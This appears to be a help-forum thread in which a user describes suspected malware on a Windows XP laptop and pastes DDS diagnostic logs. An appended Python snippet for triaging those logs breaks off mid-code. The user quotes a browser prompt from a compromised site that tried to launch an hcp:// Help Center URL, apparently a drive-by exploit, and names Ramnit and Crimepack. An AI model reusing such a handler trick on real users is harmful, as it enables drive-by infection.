Firstly, you will see that I have the Pro version of MBAM. I preferred to post on here as opposed to e-mailing support because I really didn't like the idea of accessing my e-mail account on this PC. I have also avoided logging into any sites that require passwords on this particular PC, with the exception of this forum, as I don't trust it. Next up, regarding the MBAM log are the two reported warnings. I normally have those set to be ignored so they don't appear everytime I scan. I removed those for the time being so that they would appear and just skipped fixing them. I'm not sure which software or setting affects these two warnings but I have deliberately disabled notification of Windows Updates (if that is indeed one of the warnings) as I prefer to search for updates manually. With the exception of certain software such as my anti-virus, firewall and MBAM, I don't like things running in the background, hogging my internet connection or doing things to my PC when I am trying to use it for other tasks. The second warning about the Homepage hijack may be related to Spyware Blaster. I have that set to block changes to my Internet Explorer homepage. I do have control over changing it myself however. Nevertheless if you feel that these warnings in MBAM need fixing or my settings need changing, then please feel free to tell me. Next up is the DDS.txt log. I saw the warning to disable any script blocking tools but I wasn't sure what they might be. Therefore I didn't change anything and DDS ran fine anyway. Was I supposed to disable any anti-malware software at all (Avira, Online Armour, MBAM or Spyware Blaster)? _________________________________________________________________________________________________________________________________________ . DDS (Ver_2011-08-26.01) - NTFSx86 Internet Explorer: 8.0.6001.18702 Run by UBA at 20:07:32 on 2012-04-10 Microsoft Windows XP Home Edition 5.1.2600.3.1252.44.1033.18.1007.485 [GMT 1:00] . 
AV: AntiVir Desktop *Enabled/Updated* {C19476D9-52BC-4E93-8AF3-CCF59F7AE8FE} FW: Online Armor Firewall *Enabled* . ============== Running Processes =============== . C:\WINDOWS\system32\svchost -k DcomLaunch svchost.exe C:\WINDOWS\System32\svchost.exe -k netsvcs svchost.exe C:\WINDOWS\Explorer.EXE svchost.exe C:\Program Files\Tall Emu\Online Armor\OAcat.exe C:\Program Files\Tall Emu\Online Armor\oasrv.exe C:\WINDOWS\system32\spoolsv.exe C:\Program Files\Avira\AntiVir Desktop\sched.exe svchost.exe C:\Program Files\Avira\AntiVir Desktop\avguard.exe C:\Program Files\TOSHIBA\ConfigFree\CFSvcs.exe C:\WINDOWS\System32\svchost.exe -k HTTPFilter C:\Program Files\Avira\AntiVir Desktop\avshadow.exe C:\Program Files\Malwarebytes' Anti-Malware\mbamservice.exe C:\Program Files\Analog Devices\SoundMAX\SMAgent.exe C:\Program Files\Avira\AntiVir Desktop\avmailc.exe C:\Program Files\Avira\AntiVir Desktop\AVWEBGRD.EXE C:\WINDOWS\System32\hkcmd.exe C:\WINDOWS\System32\00THotkey.exe C:\WINDOWS\LTSMMSG.exe C:\Program Files\Apoint2K\Apoint.exe C:\Program Files\TOSHIBA\TouchED\TouchED.Exe C:\Program Files\TOSHIBA\PadTouch\PadExe.exe C:\WINDOWS\system32\TFNF5.exe C:\WINDOWS\system32\TPSMain.exe C:\Program Files\TOSHIBA\TOSHIBA Controls\TFncKy.exe C:\Program Files\Tall Emu\Online Armor\oaui.exe C:\WINDOWS\system32\TPSBattM.exe C:\Program Files\Avira\AntiVir Desktop\avgnt.exe C:\Program Files\Malwarebytes' Anti-Malware\mbamgui.exe C:\Program Files\Windows Media Player\WMPNSCFG.exe C:\Program Files\Apoint2K\Apntex.exe C:\Program Files\Tall Emu\Online Armor\OAhlp.exe C:\Program Files\GetRight\GetRight.exe C:\Program Files\Logitech\SetPoint\SetPoint.exe C:\Program Files\Common Files\Logishrd\KHAL2\KHALMNPR.EXE . ============== Pseudo HJT Report =============== . 
uStart Page = hxxp://home.live.com/ BHO: Adobe PDF Link Helper: {18df081c-e8ad-4283-a596-fa578c2ebdc3} - c:\program files\common files\adobe\acrobat\activex\AcroIEHelperShim.dll BHO: IE to GetRight Helper: {31ff080d-12a3-439a-a2ef-4ba95a3148e8} - c:\program files\getright\xx2gr.dll BHO: Java Plug-In 2 SSV Helper: {dbc80044-a445-435b-bc74-9c25c1c588a9} - c:\program files\java\jre6\bin\jp2ssv.dll EB: {32683183-48a0-441b-a342-7c2a440a9478} - No File uRun: [WMPNSCFG] c:\program files\windows media player\WMPNSCFG.exe uRunOnce: [shockwave Updater] c:\windows\system32\adobe\shockwave 11\SwHelper_1151601.exe -Update -1151601 -"Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)" -"http://www.adobe.com/shockwave/welcome/" mRun: [igfxTray] c:\windows\system32\igfxtray.exe mRun: [HotKeysCmds] c:\windows\system32\hkcmd.exe mRun: [00THotkey] c:\windows\system32\00THotkey.exe mRun: [000StTHK] 000StTHK.exe mRun: [LTSMMSG] LTSMMSG.exe mRun: [Apoint] c:\program files\apoint2k\Apoint.exe mRun: [TouchED] c:\program files\toshiba\touched\TouchED.Exe mRun: [PadTouch] "c:\program files\toshiba\padtouch\PadExe.exe mRun: [TFNF5] TFNF5.exe mRun: [TPSMain] TPSMain.exe mRun: [TFncKy] TFncKy.exe mRun: [@OnlineArmor GUI] "c:\program files\tall emu\online armor\oaui.exe" mRun: [Kernel and Hardware Abstraction Layer] KHALMNPR.EXE mRun: [Adobe Reader Speed Launcher] "c:\program files\adobe\reader 9.0\reader\Reader_sl.exe" mRun: [Adobe ARM] "c:\program files\common files\adobe\arm\1.0\AdobeARM.exe" mRun: [sunJavaUpdateSched] "c:\program files\common files\java\java update\jusched.exe" mRun: [avgnt] "c:\program files\avira\antivir desktop\avgnt.exe" /min mRun: [Malwarebytes' Anti-Malware] "c:\program files\malwarebytes' anti-malware\mbamgui.exe" /starttray StartupFolder: c:\docume~1\alluse~1\startm~1\programs\startup\getright.lnk - c:\program files\getright\GetRight.exe StartupFolder: 
c:\docume~1\alluse~1\startm~1\programs\startup\logite~1.lnk - c:\program files\logitech\setpoint\SetPoint.exe IE: Download with GetRight - c:\program files\getright\GRdownload.htm IE: Open with GetRight Browser - c:\program files\getright\GRbrowse.htm IE: {e2e2dd38-d088-4134-82b7-f2ba38496583} - %windir%\Network Diagnostic\xpnetdiag.exe IE: {FB5F1910-F110-11d2-BB9E-00C04F795683} - c:\program files\messenger\msmsgs.exe LSP: c:\program files\avira\antivir desktop\avsda.dll DPF: {166B1BCA-3F9C-11CF-8075-444553540000} - hxxp://download.macromedia.com/pub/shockwave/cabs/director/sw.cab DPF: {233C1507-6A77-46A4-9443-F871F945D258} - hxxp://download.macromedia.com/pub/shockwave/cabs/director/sw.cab DPF: {6414512B-B978-451D-A0D8-FCFDF33E833C} - hxxp://www.update.microsoft.com/windowsupdate/v6/V5Controls/en/x86/client/wuweb_site.cab?1264487526468 DPF: {7530BFB8-7293-4D34-9923-61A11451AFC5} - hxxp://download.eset.com/special/eos/OnlineScanner.cab DPF: {8AD9C840-044E-11D1-B3E9-00805F499D93} - hxxp://java.sun.com/update/1.6.0/jinstall-1_6_0_20-windows-i586.cab DPF: {CAFEEFAC-0016-0000-0020-ABCDEFFEDCBA} - hxxp://java.sun.com/update/1.6.0/jinstall-1_6_0_20-windows-i586.cab DPF: {CAFEEFAC-FFFF-FFFF-FFFF-ABCDEFFEDCBA} - hxxp://java.sun.com/update/1.6.0/jinstall-1_6_0_20-windows-i586.cab DPF: {E2883E8F-472F-4FB0-9522-AC9BF37916A7} - hxxp://platformdl.adobe.com/NOS/getPlusPlus/1.6/gp.cab TCP: DhcpNameServer = 192.168.1.254 TCP: Interfaces\{1C7A2F47-0733-4991-854B-E312D1FE6FE7} : DhcpNameServer = 192.168.1.254 Notify: igfxcui - igfxsrvc.dll Notify: LBTWlgn - c:\program files\common files\logishrd\bluetooth\LBTWlgn.dll SSODL: WPDShServiceObj - {AAA288BA-9A4C-45B0-95D7-94D524869DB5} - c:\windows\system32\WPDShServiceObj.dll SEH: OA Shell Helper: {4f07da45-8170-4859-9b5f-037ef2970034} - c:\progra~1\tallem~1\online~1\oaevent.dll Hosts: 127.0.0.1 www.spywareinfo.com . ================= FIREFOX =================== . 
FF - ProfilePath - c:\documents and settings\uba\application data\mozilla\firefox\profiles\05slwm2p.default\ FF - prefs.js: network.proxy.type - 0 FF - plugin: c:\program files\divx\divx plus web player\npdivx32.dll FF - plugin: c:\program files\java\jre6\bin\new_plugin\npdeployJava1.dll FF - plugin: c:\windows\system32\macromed\flash\NPSWF32_11_2_202_228.dll . ============= SERVICES / DRIVERS =============== . R1 avgio;avgio;c:\program files\avira\antivir desktop\avgio.sys [2010-12-15 11608] R1 OADevice;OADriver;c:\windows\system32\drivers\OADriver.sys [2009-10-15 200784] R1 OAmon;OAmon;c:\windows\system32\drivers\OAmon.sys [2009-10-15 24656] R1 OAnet;OAnet;c:\windows\system32\drivers\OAnet.sys [2009-10-15 29776] R2 AntiVirMailService;Avira AntiVir MailGuard;c:\program files\avira\antivir desktop\avmailc.exe [2010-12-15 340136] R2 AntiVirSchedulerService;Avira AntiVir Scheduler;c:\program files\avira\antivir desktop\sched.exe [2010-12-15 136360] R2 AntiVirService;Avira AntiVir Guard;c:\program files\avira\antivir desktop\avguard.exe [2010-12-15 269480] R2 AntiVirWebService;Avira AntiVir WebGuard;c:\program files\avira\antivir desktop\avwebgrd.exe [2010-12-15 428200] R2 avgntflt;avgntflt;c:\windows\system32\drivers\avgntflt.sys [2010-12-15 66616] R2 MBAMService;MBAMService;c:\program files\malwarebytes' anti-malware\mbamservice.exe [2010-10-14 654408] R2 OAcat;Online Armor Helper Service;c:\program files\tall emu\online armor\oacat.exe [2009-10-15 1244360] R2 SvcOnlineArmor;Online Armor;c:\program files\tall emu\online armor\oasrv.exe [2009-10-15 3184328] R3 MBAMProtector;MBAMProtector;c:\windows\system32\drivers\mbam.sys [2010-10-14 22344] S3 AdobeFlashPlayerUpdateSvc;Adobe Flash Player Update Service;c:\windows\system32 \macromed\flash\FlashPlayerUpdateService.exe [2012-4-1 253600] . =============== Created Last 30 ================ . 
2012-04-10 14:59:12 711240 ----a-w- c:\windows\isRS-000.tmp 2012-04-04 18:56:08 -------- d-----w- c:\documents and settings\uba\local settings\application data\Mozilla 2012-04-04 10:29:42 -------- d-----w- c:\program files\Microsoft Windows 7 Upgrade Advisor 2012-04-02 22:47:58 -------- d-----w- c:\program files\HitmanPro 2012-04-02 22:47:51 -------- d-----w- c:\documents and settings\all users\application data\HitmanPro 2012-04-02 18:21:06 -------- d-----w- c:\documents and settings\uba\local settings\application data\NPE 2012-04-02 18:21:06 -------- d-----w- c:\documents and settings\all users\application data\Norton 2012-04-01 16:11:55 70304 ----a-w- c:\windows\system32\FlashPlayerCPLApp.cpl 2012-04-01 16:11:55 418464 ----a-w- c:\windows\system32\FlashPlayerApp.exe . ==================== Find3M ==================== . 2012-04-04 14:56:40 22344 ----a-w- c:\windows\system32\drivers\mbam.sys 2012-03-31 10:13:21 66616 ----a-w- c:\windows\system32\drivers\avgntflt.sys . ============= FINISH: 20:10:51.20 =============== _________________________________________________________________________________________________________________________________________ Since running DDS in my first post, I have installed Firefox (which I normally use on another PC), installed Windows 7 Upgrade Adviser (just to see what kind of result it would give me, even though I wasn't planning to install W7 on this PC, and the Adviser always crashes), and also installed Hitman Pro, just to test it. Additionally I also switched on my external HDD as the bulk of my data is on there. I don't know if the latter makes any difference to DDS' results though. I have not installed any Windows Updates for XP since last year as I didn't want to alter the OS too much if the PC is infected. Likewise, I haven't updated Java for the same reasons. Please could you view my first post for details on why those are out of date, if that is ok. 
I never used Firefox on this PC in the past and only used Internet Explorer. IE runs terribly slow and temporarily freezes frequently when visiting sites. That may be down to poor hardware specs though as Firefox does likewise (although vastly less often). In fact, the PC behaves slowly and freezes sometimes even when no browsers are being used. MBAM takes a long time to update and spends most of its time saying it is connecting to the server (in contrast, my netbook PC connects to the MBAM servers instantly but is more modern (if not all that powerful), runs Windows 7 and has different anti-virus and firewall software). This PC never shuts down properly either and I have to press the power switch to complete the Shutting Down process. This occurred the same day as I started seeing the strange download requests. I thought the download prompts were exclusive to Internet Explorer (I thought it was an IE window appearing) but installing Firefox told me otherwise. Those prompts appear in FF also. They all seem to be related to sites that use Java. As well as the sites mentioned in my first post, I recently tried Runescape.com and the British Telecom speed test site. Whenever I visit sites such as these, I get the window asking me to download something, with the publisher always being listed as Microsoft Corporation. This is highly suspect seeing as those sites won't have anything to do with MS. Also, there is always a problem with the signature verification, saying that it has expired or is invalid. I always cancel the request to download. The site's application will then display and run as normal. If not, then another prompt appears with the publisher being far more likely (e.g. Jagex for Runescape). The digital signature is also verified. Before I recently removed it, I visited an old bookmark (while using IE) that I had added a few years ago. Not remembering what it was, I visited it. I know for sure it wasn't a bad site (pirated software, pornography, etc.). 
I got redirected to one of those old screens saying Congratulations, you're our 1000th visitor of the day. Click here to go claim your prize. I haven't seen those damn things in ages. Annoyingly I couldn't close it and it wasn't a popup. I couldn't even close IE normally and every time I tried to close it with Task Manager, the End Program window kept disappearing every time I tried to get my mouse pointer near it. Another site had been replaced with a screen full of banner ads. This one was more alarming as Avira's Web Guard said it blocked TR/Ramnit.E. At the same time, I saw a prompt appear saying the following: Do you want to allow this website to open a program on your computer? From: de.exoticbeijing.com Program: Microsoft Help and Support Center Address: hcp://services/search?query=anything&topic=hcp://system/sysinfo/sysinfomain.htm I cancelled it and haven't seen anything like that since. I don't know if that was just something lying in wait at the now dodgy website or is related to the problems I have been seeing. Seeing Microsoft appear once again made me wonder. Also, there was the fact that Avira listed Ramnit and one site I noted visiting, shortly before my accident last year when I last used this PC, asked if I wanted to download something called cpak.Crimepack (with the same Java related prompt). 
I once read about that and Ramnit got mentioned at the same time. I have since removed lots of bookmarks, if they are not ones that I remember or recognise. I'm sure I added them myself, as opposed to them being rogue but they were more than likely added years ago. I had a habit of adding bookmarks to look at later and then not deleting them. Once again, sorry for the lengthy post. As always, I wanted to give as much detail as possible. Kind regards, Paul
  7. Hello, I am experiencing some odd behaviour with my laptop PC. It is an old PC with Windows XP and Internet Explorer 8. I have Avira Premium and MBAM. To give some background, this is something that actually occurred in January 2011 that I never got round to resolving. A few days after experiencing this problem, and before being able to report it on this site, I suffered a near fatal accident that took me a long time to recover from (I still haven't fully recovered, even a year later, and maybe never will). Even when my health was starting to improve, months later after returning home, looking into fixing the PC was the last thing I was interested in. Therefore it sat unused until just recently, when I decided I needed to finally get it sorted. To describe the problems I have been experiencing, it happened while visiting a website. Which one it was I have no idea (and I can't truly remember what I was doing last year before my accident). I do remember visiting an apparently innocuous forum after which I was seeing strange happenings but that might be unrelated. Fortunately, I happened to make notes before my accident so I could detail the symptoms on this forum. I have also done a little internet browsing today before posting and seen that nothing has changed a year later. My laptop has Internet Explorer 8 and upon visiting certain websites, usually or maybe only ones involving Java, I would see a download prompt appear asking whether I wanted to download a particular file. The file would vary but the source would always be apparently from Microsoft, regardless of the site I am visiting. If I declined the download (which I always did), everything would behave normally anyway. For instance, if I visit thinkbroadband.com and click on Speed Test (on the lower left of the page), I will go to their test page and see the circular Java logo appear as it loads in. 
I will then see the standard IE8 download prompt appear saying: NAME: SpeedTester201 PUBLISHER: Microsoft Corporation FROM: file:// If I click Cancel, it all loads anyway. The prompt always reports that the application's digital signature has an error. Visiting pingtest.net brings up the same prompt and the same digital signature error, except that the Name is now VoipApplet, instead of SpeedTester201 (but still apparently from Microsoft). Those are two sites that I can visit right now to see the prompt but I saw that I had written in my notes last year some other requests that came up. Unfortunately, I didn't note the sites I visited. These were: NAME: goog.main PUBLISHER: Microsoft Corporation FROM: file:// and NAME: cpak.Crimepack PUBLISHER: Microsoft Corporation FROM: file:// The day that all this started happening, I also experienced other problems. I tried to do a System Restore but it always failed. I can't remember what caused it but the Restore Points then got wiped. I also saw a BSOD error with a report saying: Page_Fault_in_non_paged_area STOP 0X00000050 (0XF7F45000, 0X0000001, 0X804D9A69, 0X0000000) I haven't experienced any other BSOD errors so far but there is the other problem where Windows XP no longer shuts down successfully. I get the blue Shutting Down screen but almost always have to press the power button to switch off the PC (except in very rare cases). Basically, 9 times out of 10, I will have to press the power button. Restarting the PC is equally impossible. I did a file search recently to see if any files had been modified after booting up again a year later and noticed today that several image files (that I haven't viewed or gone anywhere near since last year) have dates that show the years 2019, 2038 and 2101. File creation dates are normal. This may or may not be down to the fact the time and date were incorrect until yesterday when I synchronised it with the internet time. 
Download speeds might be affected as they report far lower speeds than another PC I have access to. The other PC is a modern netbook with Windows 7 and on that I see speeds saying over 7Mb. On this laptop with Windows XP I don't see speeds faster than 4Mb. That might be down to the older technology though as opposed to any malware (to give an uneducated guess). I have run full scans with Avira, MBAM, Kaspersky's TDSS Killer and Norton Power Eraser and so far no detections have been found. TDSS Killer found several files with unrecognised digital signatures but nothing else. I have left them untouched for now. I have so far not tried scanning with any other software. I ran netstat from the command prompt and that shows lots of connections, all in the Time_Wait state. Those connections are shown even when no browser is open. Other than Avira, MBAM and the Online Armor firewall, I can't think of what else might be running. Most software I have set to connect to the net only when I want them to. Other than the symptoms I have listed, there does not seem to be any other strange behaviour with the PC. I have copied and pasted results from the DDS software. If you see any out of date software, that is because I haven't updated anything in all this time, other than Avira and MBAM, as I have only just switched the PC back on a day before. I also did not want to perform any Windows Updates or Java updates that may hinder detecting or destroying any malware. ____________________________________________________________________ DDS.txt ____________________________________________________________________ . DDS (Ver_2011-08-26.01) - NTFSx86 Internet Explorer: 8.0.6001.18702 Run by UBA at 19:36:30 on 2012-04-02 Microsoft Windows XP Home Edition 5.1.2600.3.1252.44.1033.18.1007.434 [GMT 1:00] . AV: AntiVir Desktop *Enabled/Updated* {C19476D9-52BC-4E93-8AF3-CCF59F7AE8FE} FW: Online Armor Firewall *Enabled* . ============== Running Processes =============== . 
C:\WINDOWS\system32\svchost -k DcomLaunch svchost.exe C:\WINDOWS\System32\svchost.exe -k netsvcs svchost.exe svchost.exe C:\WINDOWS\Explorer.EXE C:\Program Files\Tall Emu\Online Armor\OAcat.exe C:\Program Files\Tall Emu\Online Armor\oasrv.exe C:\WINDOWS\system32\spoolsv.exe C:\Program Files\Avira\AntiVir Desktop\sched.exe svchost.exe C:\Program Files\Avira\AntiVir Desktop\avguard.exe C:\Program Files\TOSHIBA\ConfigFree\CFSvcs.exe C:\WINDOWS\System32\svchost.exe -k HTTPFilter C:\Program Files\Malwarebytes' Anti-Malware\mbamservice.exe C:\Program Files\Avira\AntiVir Desktop\avshadow.exe C:\Program Files\Analog Devices\SoundMAX\SMAgent.exe C:\Program Files\Avira\AntiVir Desktop\avmailc.exe C:\Program Files\Avira\AntiVir Desktop\AVWEBGRD.EXE C:\WINDOWS\System32\hkcmd.exe C:\WINDOWS\System32\00THotkey.exe C:\WINDOWS\LTSMMSG.exe C:\Program Files\Apoint2K\Apoint.exe C:\Program Files\TOSHIBA\TouchED\TouchED.Exe C:\Program Files\TOSHIBA\PadTouch\PadExe.exe C:\WINDOWS\system32\TFNF5.exe C:\WINDOWS\system32\TPSMain.exe C:\Program Files\TOSHIBA\TOSHIBA Controls\TFncKy.exe C:\Program Files\Tall Emu\Online Armor\oaui.exe C:\WINDOWS\system32\TPSBattM.exe C:\Program Files\Apoint2K\Apntex.exe C:\Program Files\Avira\AntiVir Desktop\avgnt.exe C:\Program Files\Tall Emu\Online Armor\OAhlp.exe C:\Program Files\Malwarebytes' Anti-Malware\mbamgui.exe C:\Program Files\Windows Media Player\WMPNSCFG.exe C:\Program Files\GetRight\GetRight.exe C:\Program Files\Logitech\SetPoint\SetPoint.exe C:\Program Files\Common Files\Logishrd\KHAL2\KHALMNPR.EXE . ============== Pseudo HJT Report =============== . 
uStart Page = hxxp://home.live.com/ BHO: Adobe PDF Link Helper: {18df081c-e8ad-4283-a596-fa578c2ebdc3} - c:\program files\common files\adobe\acrobat\activex\AcroIEHelperShim.dll BHO: IE to GetRight Helper: {31ff080d-12a3-439a-a2ef-4ba95a3148e8} - c:\program files\getright\xx2gr.dll BHO: Java Plug-In 2 SSV Helper: {dbc80044-a445-435b-bc74-9c25c1c588a9} - c:\program files\java\jre6\bin\jp2ssv.dll EB: {32683183-48a0-441b-a342-7c2a440a9478} - No File uRun: [WMPNSCFG] c:\program files\windows media player\WMPNSCFG.exe uRunOnce: [shockwave Updater] c:\windows\system32\adobe\shockwave 11\SwHelper_1151601.exe -Update -1151601 -"Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)" -"http://www.adobe.com/shockwave/welcome/" mRun: [igfxTray] c:\windows\system32\igfxtray.exe mRun: [HotKeysCmds] c:\windows\system32\hkcmd.exe mRun: [00THotkey] c:\windows\system32\00THotkey.exe mRun: [000StTHK] 000StTHK.exe mRun: [LTSMMSG] LTSMMSG.exe mRun: [Apoint] c:\program files\apoint2k\Apoint.exe mRun: [TouchED] c:\program files\toshiba\touched\TouchED.Exe mRun: [PadTouch] "c:\program files\toshiba\padtouch\PadExe.exe mRun: [TFNF5] TFNF5.exe mRun: [TPSMain] TPSMain.exe mRun: [TFncKy] TFncKy.exe mRun: [@OnlineArmor GUI] "c:\program files\tall emu\online armor\oaui.exe" mRun: [Kernel and Hardware Abstraction Layer] KHALMNPR.EXE mRun: [Adobe Reader Speed Launcher] "c:\program files\adobe\reader 9.0\reader\Reader_sl.exe" mRun: [Adobe ARM] "c:\program files\common files\adobe\arm\1.0\AdobeARM.exe" mRun: [sunJavaUpdateSched] "c:\program files\common files\java\java update\jusched.exe" mRun: [avgnt] "c:\program files\avira\antivir desktop\avgnt.exe" /min mRun: [Malwarebytes' Anti-Malware] "c:\program files\malwarebytes' anti-malware\mbamgui.exe" /starttray StartupFolder: c:\docume~1\alluse~1\startm~1\programs\startup\getright.lnk - c:\program files\getright\GetRight.exe StartupFolder: 
c:\docume~1\alluse~1\startm~1\programs\startup\logite~1.lnk - c:\program files\logitech\setpoint\SetPoint.exe IE: Download with GetRight - c:\program files\getright\GRdownload.htm IE: Open with GetRight Browser - c:\program files\getright\GRbrowse.htm IE: {e2e2dd38-d088-4134-82b7-f2ba38496583} - %windir%\Network Diagnostic\xpnetdiag.exe IE: {FB5F1910-F110-11d2-BB9E-00C04F795683} - c:\program files\messenger\msmsgs.exe LSP: c:\program files\avira\antivir desktop\avsda.dll DPF: {166B1BCA-3F9C-11CF-8075-444553540000} - hxxp://download.macromedia.com/pub/shockwave/cabs/director/sw.cab DPF: {233C1507-6A77-46A4-9443-F871F945D258} - hxxp://download.macromedia.com/pub/shockwave/cabs/director/sw.cab DPF: {6414512B-B978-451D-A0D8-FCFDF33E833C} - hxxp://www.update.microsoft.com/windowsupdate/v6/V5Controls/en/x86/client/wuweb_site.cab?1264487526468 DPF: {7530BFB8-7293-4D34-9923-61A11451AFC5} - hxxp://download.eset.com/special/eos/OnlineScanner.cab DPF: {8AD9C840-044E-11D1-B3E9-00805F499D93} - hxxp://java.sun.com/update/1.6.0/jinstall-1_6_0_20-windows-i586.cab DPF: {CAFEEFAC-0016-0000-0020-ABCDEFFEDCBA} - hxxp://java.sun.com/update/1.6.0/jinstall-1_6_0_20-windows-i586.cab DPF: {CAFEEFAC-FFFF-FFFF-FFFF-ABCDEFFEDCBA} - hxxp://java.sun.com/update/1.6.0/jinstall-1_6_0_20-windows-i586.cab DPF: {E2883E8F-472F-4FB0-9522-AC9BF37916A7} - hxxp://platformdl.adobe.com/NOS/getPlusPlus/1.6/gp.cab TCP: DhcpNameServer = 192.168.1.254 TCP: Interfaces\{1C7A2F47-0733-4991-854B-E312D1FE6FE7} : DhcpNameServer = 192.168.1.254 Notify: igfxcui - igfxsrvc.dll Notify: LBTWlgn - c:\program files\common files\logishrd\bluetooth\LBTWlgn.dll SSODL: WPDShServiceObj - {AAA288BA-9A4C-45B0-95D7-94D524869DB5} - c:\windows\system32\WPDShServiceObj.dll SEH: OA Shell Helper: {4f07da45-8170-4859-9b5f-037ef2970034} - c:\progra~1\tallem~1\online~1\oaevent.dll Hosts: 127.0.0.1 www.spywareinfo.com . ============= SERVICES / DRIVERS =============== . 
R0 SMR250;Symantec SMR Utility Service 2.5.0;c:\windows\system32\drivers\SMR250.SYS [2012-4-2 83064] R1 avgio;avgio;c:\program files\avira\antivir desktop\avgio.sys [2010-12-15 11608] R1 OADevice;OADriver;c:\windows\system32\drivers\OADriver.sys [2009-10-15 200784] R1 OAmon;OAmon;c:\windows\system32\drivers\OAmon.sys [2009-10-15 24656] R1 OAnet;OAnet;c:\windows\system32\drivers\OAnet.sys [2009-10-15 29776] R2 AntiVirMailService;Avira AntiVir MailGuard;c:\program files\avira\antivir desktop\avmailc.exe [2010-12-15 340136] R2 AntiVirSchedulerService;Avira AntiVir Scheduler;c:\program files\avira\antivir desktop\sched.exe [2010-12-15 136360] R2 AntiVirService;Avira AntiVir Guard;c:\program files\avira\antivir desktop\avguard.exe [2010-12-15 269480] R2 AntiVirWebService;Avira AntiVir WebGuard;c:\program files\avira\antivir desktop\avwebgrd.exe [2010-12-15 428200] R2 avgntflt;avgntflt;c:\windows\system32\drivers\avgntflt.sys [2010-12-15 66616] R2 MBAMService;MBAMService;c:\program files\malwarebytes' anti-malware\mbamservice.exe [2010-10-14 652360] R2 OAcat;Online Armor Helper Service;c:\program files\tall emu\online armor\oacat.exe [2009-10-15 1244360] R2 SvcOnlineArmor;Online Armor;c:\program files\tall emu\online armor\oasrv.exe [2009-10-15 3184328] R3 MBAMProtector;MBAMProtector;c:\windows\system32\drivers\mbam.sys [2010-10-14 20464] S3 AdobeFlashPlayerUpdateSvc;Adobe Flash Player Update Service;c:\windows\system32 \macromed\flash\FlashPlayerUpdateService.exe [2012-4-1 253600] . =============== Created Last 30 ================ . 2012-04-02 18:21:15 83064 ----a-w- c:\windows\system32\drivers\SMR250.SYS 2012-04-02 18:21:06 -------- d-----w- c:\documents and settings\uba\local settings\application data\NPE 2012-04-02 18:21:06 -------- d-----w- c:\documents and settings\all users\application data\Norton 2012-04-01 16:11:55 70304 ----a-w- c:\windows\system32\FlashPlayerCPLApp.cpl 2012-04-01 16:11:55 418464 ----a-w- c:\windows\system32\FlashPlayerApp.exe . 
==================== Find3M ==================== . 2012-03-31 10:13:21 66616 ----a-w- c:\windows\system32\drivers\avgntflt.sys . ============= FINISH: 19:39:48.00 =============== ____________________________________________________________________ Attach.txt ____________________________________________________________________ . UNLESS SPECIFICALLY INSTRUCTED, DO NOT POST THIS LOG. IF REQUESTED, ZIP IT UP & ATTACH IT . DDS (Ver_2011-08-26.01) . Microsoft Windows XP Home Edition Boot Device: \Device\HarddiskVolume1 Install Date: 14/10/2009 03:36:39 System Uptime: 02/04/2012 19:24:58 (0 hours ago) . Motherboard: TOSHIBA | | Portable PC Processor: Intel® Celeron® CPU 2.70GHz | uFC-PGA Socket | 2693/100mhz . ==== Disk Partitions ========================= . C: is FIXED (NTFS) - 28 GiB total, 4.703 GiB free. D: is CDROM () E: is FIXED (NTFS) - 466 GiB total, 137.642 GiB free. . ==== Disabled Device Manager Items ============= . ==== System Restore Points =================== . RP275: 16/12/2011 04:11:38 - Restore Operation RP276: 10/02/2012 09:17:09 - System Checkpoint RP277: 09/03/2012 07:39:47 - System Checkpoint RP278: 01/04/2012 16:39:40 - Removed Simple Adblock RP279: 02/04/2012 18:24:20 - System Checkpoint . ==== Installed Programs ====================== . 
. ==== Event Viewer Messages From Past Week ======== . 31/03/2012 12:35:37, error: W32Time [34] - The time service has detected that the system time needs to be changed by +96601 seconds. The time service will not change the system time by more than +54000 seconds. Verify that your time and time zone are correct, and that the time source time.windows.com (ntp.m|0x1|192.168.1.65:123->65.55.21.15:123) is working properly. 31/03/2012 11:08:20, error: Service Control Manager [7000] - The tossmbnt service failed to start due to the following error: The system cannot find the file specified. 31/03/2012 10:54:44, error: W32Time [34] - The time service has detected that the system time needs to be changed by +96600 seconds. The time service will not change the system time by more than +54000 seconds. Verify that your time and time zone are correct, and that the time source time.windows.com (ntp.m|0x1|192.168.1.65:123->65.55.21.19:123) is working properly. 02/04/2012 19:26:37, error: Service Control Manager [7026] - The following boot-start or system-start driver(s) failed to load: IntelIde 01/04/2012 16:09:50, error: Service Control Manager [7023] - The Application Management service terminated with the following error: The specified module could not be found. . ==== End Of File =========================== ____________________________________________________________________ I apologise for the length of this post but I wanted to give as much detail as I could. I also wanted to give some detail as to why I had to leave it so long to address the problems I have been experiencing on this PC. Thank you in advance for your help. Kind regards, Paul (Solaris Wave)
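The Pseudo HJT Report section of a DDS log (posted above, and again in the later re-run) is what a helper reads first. The following is an added example, my own code and not part of DDS or of these posts: it parses lines in that format and flags the entries a helper usually checks first. The sample input is a handful of lines copied from the log above, and the flag names are labels I made up.

```python
"""Triage the 'Pseudo HJT Report' section of a DDS log.

Added example, not part of DDS or of the original post. The flag names
("orphaned", "unqualified-path", ...) are my own labels, not DDS output.
DDS writes "hxxp" instead of "http" so that URLs in the log are not clickable.
"""
import re
from collections import Counter

# A subset of lines copied from the DDS log in the post above, used here as
# constructed sample input; a real run would read the whole DDS.txt.
SAMPLE_LOG = r"""
uStart Page = hxxp://home.live.com/
BHO: Adobe PDF Link Helper: {18df081c-e8ad-4283-a596-fa578c2ebdc3} - c:\program files\common files\adobe\acrobat\activex\AcroIEHelperShim.dll
EB: {32683183-48a0-441b-a342-7c2a440a9478} - No File
mRun: [000StTHK] 000StTHK.exe
mRun: [avgnt] "c:\program files\avira\antivir desktop\avgnt.exe" /min
DPF: {8AD9C840-044E-11D1-B3E9-00805F499D93} - hxxp://java.sun.com/update/1.6.0/jinstall-1_6_0_20-windows-i586.cab
Hosts: 127.0.0.1 www.spywareinfo.com
TCP: DhcpNameServer = 192.168.1.254
"""

CLSID_RE = re.compile(r"\{[0-9A-Fa-f]{8}(?:-[0-9A-Fa-f]{4}){3}-[0-9A-Fa-f]{12}\}")
RUN_RE = re.compile(r"\[(.+?)\]\s*(.*)")
RUN_KINDS = {"uRun", "mRun", "uRunOnce", "mRunOnce"}
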